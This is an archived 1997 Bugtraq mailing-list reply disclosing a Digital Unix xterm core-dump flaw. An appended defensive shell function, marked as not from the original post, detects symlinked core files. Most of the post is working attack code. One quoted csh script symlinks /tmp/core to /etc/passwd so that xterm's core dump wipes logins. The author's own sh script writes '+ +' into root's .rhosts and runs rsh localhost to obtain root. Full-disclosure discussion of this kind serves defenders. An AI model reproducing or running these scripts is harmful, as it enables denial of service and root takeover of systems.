[5588] in bugtraq
Re: Digital Unix Security Problem
daemon@ATHENA.MIT.EDU (Andrew Brown)
Thu Nov 13 12:27:53 1997
Errors-To: receipts@daemon.org
Date: Thu, 13 Nov 1997 11:32:23 -0500
Reply-To: Andrew Brown <codewarrior@daemon.org>
From: Andrew Brown <codewarrior@DAEMON.ORG>
X-To: tom@sba.miami.edu
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.3.96.971112142044.12555C-100000@homer.bus.miami.edu>
from "Tom Leffingwell" at Nov 12, 97 02:51:40 pm
> Even with a buffer overflow, I've never seen anyone exploit on one
> DU. If anyone has done so successfully, please email me. Despite that, a
> person with basic knowledge of unix could easily do something like:
>
> #!/bin/csh
> cd /tmp
> ln -s /etc/passwd /tmp/core
> setenv DISPLAY abcdefghi
> /usr/bin/X11/xterm
>
> The contents of /etc/passwd becomes xterm's core, preventing
> further logins. Obviously you could do things without an immediate impact
> such as ln -s /vmunix /tmp/core.
or...if the system you're on is actually running r-services, you could do
#!/bin/sh
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
rsh localhost
which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file. then all that remains
is the rsh localhost and you're all set!
considerably easier than a buffer overflow exploit...
--
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan) * "ah! i see you have the internet
codewarrior@daemon.org that goes *ping*!"
warfare@graffiti.com * "information is power -- share the wealth."
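An added defensive check, not code from the original post: a POSIX shell function that scans a directory such as /tmp for symlinks named core, which is the setup step both scripts above rely on. The scratch directory and file names it creates are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not from the original post: audit a world-writable
# directory for symlinks named "core" (the setup step of the xterm
# core-dump trick above). Prints one line per link found on stderr,
# then the count on stdout.
count_core_links() {
    dir="$1"
    n=0
    for f in "$dir"/core "$dir"/core.*; do
        [ -L "$f" ] || continue          # only symlinks matter here
        printf 'symlinked core in %s: %s -> %s\n' \
            "$dir" "$f" "$(readlink "$f")" >&2
        n=$((n + 1))
    done
    echo "$n"
}

# Constructed sample directory standing in for /tmp
demo_dir=$(mktemp -d)
: > "$demo_dir/passwd.copy"                 # stand-in for /etc/passwd
ln -s "$demo_dir/passwd.copy" "$demo_dir/core"
count_core_links "$demo_dir"
```

Run it periodically from cron against /tmp and any other world-writable directory; a non-zero count is the signal to investigate.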